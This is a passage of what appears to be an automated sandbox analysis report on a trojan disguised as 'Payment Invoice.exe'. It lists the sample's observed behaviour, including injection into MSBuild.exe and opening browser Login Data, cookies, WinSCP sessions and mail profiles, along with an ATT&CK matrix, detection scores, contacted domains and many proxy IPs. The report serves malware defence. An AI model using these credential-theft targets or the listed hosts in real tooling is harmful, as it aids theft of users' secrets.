                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.LOG1.9.dr, Amcache.hve.9.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3068273455.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3065106741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3068273455.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 42988, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3068273455.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3065106741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 42988, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3068273455.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3065106741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3068273455.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 42988, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts211
                Process Injection
                1
                Obfuscated Files or Information
                11
                Input Capture
                24
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Timestomp
                1
                Credentials in Registry
                1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                11
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDS121
                Security Software Discovery
                Distributed Component Object Model11
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                Virtualization/Sandbox Evasion
                LSA Secrets1
                Process Discovery
                SSHKeylogging24
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                Process Injection
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Payment Invoice.exe45%ReversingLabsByteCode-MSIL.Trojan.Zilla
                Payment Invoice.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://161.97.173.78:49145://proxy0%Avira URL Cloudsafe
                http://5.252.23.220:31280%Avira URL Cloudsafe
                http://176.113.73.99:31280%Avira URL Cloudsafe
                http://5.58.33.187:555070%Avira URL Cloudsafe
                http://200.7.11.150%Avira URL Cloudsafe
                http://127.0.0.7:800%Avira URL Cloudsafe
                http://37.53.90.82:125420%Avira URL Cloudsafe
                http://170.210.121.190:8080://proxy0%Avira URL Cloudsafe
                http://173.212.209.49:316730%Avira URL Cloudsafe
                http://104.21.6.88:800%Avira URL Cloudsafe
                http://92.205.61.38:4300://proxy0%Avira URL Cloudsafe
                http://165.227.95.2:8080://proxy0%Avira URL Cloudsafe
                http://178.212.48.80:80800%Avira URL Cloudsafe
                http://198.57.229.185:64767://proxy0%Avira URL Cloudsafe
                http://185.82.87.30:1080://proxy0%Avira URL Cloudsafe
                http://50.145.6.360%Avira URL Cloudsafe
                http://51.77.65.164:319790%Avira URL Cloudsafe
                http://72.10.164.178:11251://proxy0%Avira URL Cloudsafe
                http://107.180.95.177:63951://proxy0%Avira URL Cloudsafe
                http://72.10.160.90:178930%Avira URL Cloudsafe
                http://181.205.41.21:76540%Avira URL Cloudsafe
                http://50.145.6.320%Avira URL Cloudsafe
                http://184.178.172.25:152910%Avira URL Cloudsafe
                http://103.28.121.58:3128://proxy0%Avira URL Cloudsafe
                http://95.71.125.50:608670q0%Avira URL Cloudsafe
                http://93.182.76.244:5678://proxy0%Avira URL Cloudsafe
                http://212.220.13.98:4153://proxy0%Avira URL Cloudsafe
                http://201.77.108.64:9990%Avira URL Cloudsafe
                http://102.216.69.176:8080://proxy0%Avira URL Cloudsafe
                http://207.180.234.220:397370%Avira URL Cloudsafe
                http://203.128.77.213:333780%Avira URL Cloudsafe
                http://27.0.234.206:1080://proxy0%Avira URL Cloudsafe
                http://98.64.169.17:8080://proxy0%Avira URL Cloudsafe
                http://2.179.193.146:31280%Avira URL Cloudsafe
                http://104.20.103.68://proxy0%Avira URL Cloudsafe
                http://210.72.11.46:8080://proxy0%Avira URL Cloudsafe
                http://162.55.87.48:55660%Avira URL Cloudsafe
                http://59.98.4.70:80800%Avira URL Cloudsafe
                http://103.90.227.244:31280%Avira URL Cloudsafe
                http://72.10.160.170:5385://proxy0%Avira URL Cloudsafe
                http://67.43.227.227:24110%Avira URL Cloudsafe
                http://91.134.140.160:27207://proxy0%Avira URL Cloudsafe
                http://152.32.132.220://proxy0%Avira URL Cloudsafe
                http://94.131.203.7:80800%Avira URL Cloudsafe
                http://46.21.153.16:3128://proxy0%Avira URL Cloudsafe
                http://188.132.222.194:8080://proxy0%Avira URL Cloudsafe
                http://103.216.51.36:326500%Avira URL Cloudsafe
                http://184.178.172.14:4145://proxy0%Avira URL Cloudsafe
                http://149.126.101.162:8080://proxy0%Avira URL Cloudsafe
                http://186.219.96.12:52017://proxy0%Avira URL Cloudsafe
                http://221.153.92.39:800%Avira URL Cloudsafe
                http://107.180.90.88:203090%Avira URL Cloudsafe
                http://72.10.164.178:1431://proxy0%Avira URL Cloudsafe
                http://159.192.102.249:8080://proxy0%Avira URL Cloudsafe
                http://188.165.2520%Avira URL Cloudsafe
                http://62.99.138.162://proxy0%Avira URL Cloudsafe
                http://183.88.184.48:80800%Avira URL Cloudsafe
                http://104.19.235.100%Avira URL Cloudsafe
                http://45.65.137.218:9990q0%Avira URL Cloudsafe
                http://103.217.213.145:4145://proxy0%Avira URL Cloudsafe
                http://111.59.4.88:9002://proxy0%Avira URL Cloudsafe
                http://51.81.186.179:51405://proxy0%Avira URL Cloudsafe
                http://86.107.178.103:3128://proxy0%Avira URL Cloudsafe
                http://62.141.70.118:800%Avira URL Cloudsafe
                http://162.214.225.223:405360%Avira URL Cloudsafe
                http://174.64.199.82:4145://proxy0%Avira URL Cloudsafe
                http://92.205.110.118:154300%Avira URL Cloudsafe
                http://31.43.179.160:800%Avira URL Cloudsafe
                http://115.240.163.310%Avira URL Cloudsafe
                http://72.195.34.59:4145://proxy0%Avira URL Cloudsafe
                http://160.3.168.70:80800%Avira URL Cloudsafe
                http://32.223.6.94:800%Avira URL Cloudsafe
                http://161.97.173.42:50386://proxy0%Avira URL Cloudsafe
                http://103.234.24.105:88800%Avira URL Cloudsafe
                http://61.216.156.222:60808://proxy0%Avira URL Cloudsafe
                http://66.29.129.53:14464://proxy0%Avira URL Cloudsafe
                http://145.239.199.109:31280%Avira URL Cloudsafe
                http://141.95.160.178:58700%Avira URL Cloudsafe
                http://104.17.166.210:800%Avira URL Cloudsafe
                http://223.25.100.42:2222://proxy0%Avira URL Cloudsafe
                http://169.57.157.146:81230%Avira URL Cloudsafe
                http://114.99.13.192:8004://proxy0%Avira URL Cloudsafe
                http://103.131.8.27:56780%Avira URL Cloudsafe
                http://162.241.6.97:45629://proxy0%Avira URL Cloudsafe
                http://104.247.163.246:38250%Avira URL Cloudsafe
                http://84.241.8.234:80800%Avira URL Cloudsafe
                http://104.16.109.1430%Avira URL Cloudsafe
                http://137.184.200.42:8000://proxy0%Avira URL Cloudsafe
                http://5.135.83.214:800%Avira URL Cloudsafe
                http://162.55.87.48:5566://proxy0%Avira URL Cloudsafe
                http://185.202.165.1:53281://proxy0%Avira URL Cloudsafe
                http://50.231.110.26://proxy0%Avira URL Cloudsafe
                http://185.129.250.1830%Avira URL Cloudsafe
                http://45.174.87.18:999://proxy0%Avira URL Cloudsafe
                http://50.168.210.239:800%Avira URL Cloudsafe
                http://37.26.223.96:9080://proxy0%Avira URL Cloudsafe
                http://185.49.31.207:8081://proxy0%Avira URL Cloudsafe
                http://35.207.123.94://proxy0%Avira URL Cloudsafe
                http://162.214.165.6:42624://proxy0%Avira URL Cloudsafe
                http://209.250.248.127:45534://proxy0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                orako.co.ke
                34.195.165.88
                truetrue
                  unknown
                  ktxcomay.com.vn
                  222.255.238.159
                  truefalse
                    unknown
                    artemis-rat.com
                    172.67.140.87
                    truefalse
                      unknown
                      github.com
                      140.82.113.4
                      truefalse
                        high
                        www.avis.com.hn
                        172.67.199.231
                        truefalse
                          unknown
                          api.ipify.org
                          172.67.74.152
                          truefalse
                            high
                            fp2e7a.wpc.phicdn.net
                            192.229.211.108
                            truefalse
                              unknown
                              mail.orako.co.ke
                              unknown
                              unknowntrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://170.210.121.190:8080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://5.58.33.187:55507Payment Invoice.exe, 00000000.00000002.3288321931.000001631718B000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163171B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://37.53.90.82:12542Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://5.252.23.220:3128Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://176.113.73.99:3128Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://104.21.6.88:80Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://161.97.173.78:49145://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://200.7.11.15Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://173.212.209.49:31673Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://127.0.0.7:80Payment Invoice.exe, 00000000.00000002.3288321931.00000163184D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://92.205.61.38:4300://proxyPayment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://165.227.95.2:8080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://72.10.164.178:11251://proxyPayment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://50.145.6.36Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://178.212.48.80:8080Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.82.87.30:1080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://51.77.65.164:31979Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://198.57.229.185:64767://proxyPayment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://72.10.160.90:17893Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://107.180.95.177:63951://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://181.205.41.21:7654Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://50.145.6.32Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://103.28.121.58:3128://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://184.178.172.25:15291Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://201.77.108.64:999Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://95.71.125.50:608670qPayment Invoice.exe, 00000000.00000002.3288321931.0000016317A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://93.182.76.244:5678://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://212.220.13.98:4153://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://203.128.77.213:33378Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://207.180.234.220:39737Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631840F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://27.0.234.206:1080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://102.216.69.176:8080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://104.20.103.68://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://2.179.193.146:3128Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://98.64.169.17:8080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://162.55.87.48:5566Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://210.72.11.46:8080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://103.90.227.244:3128Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://59.98.4.70:8080Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://67.43.227.227:2411Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
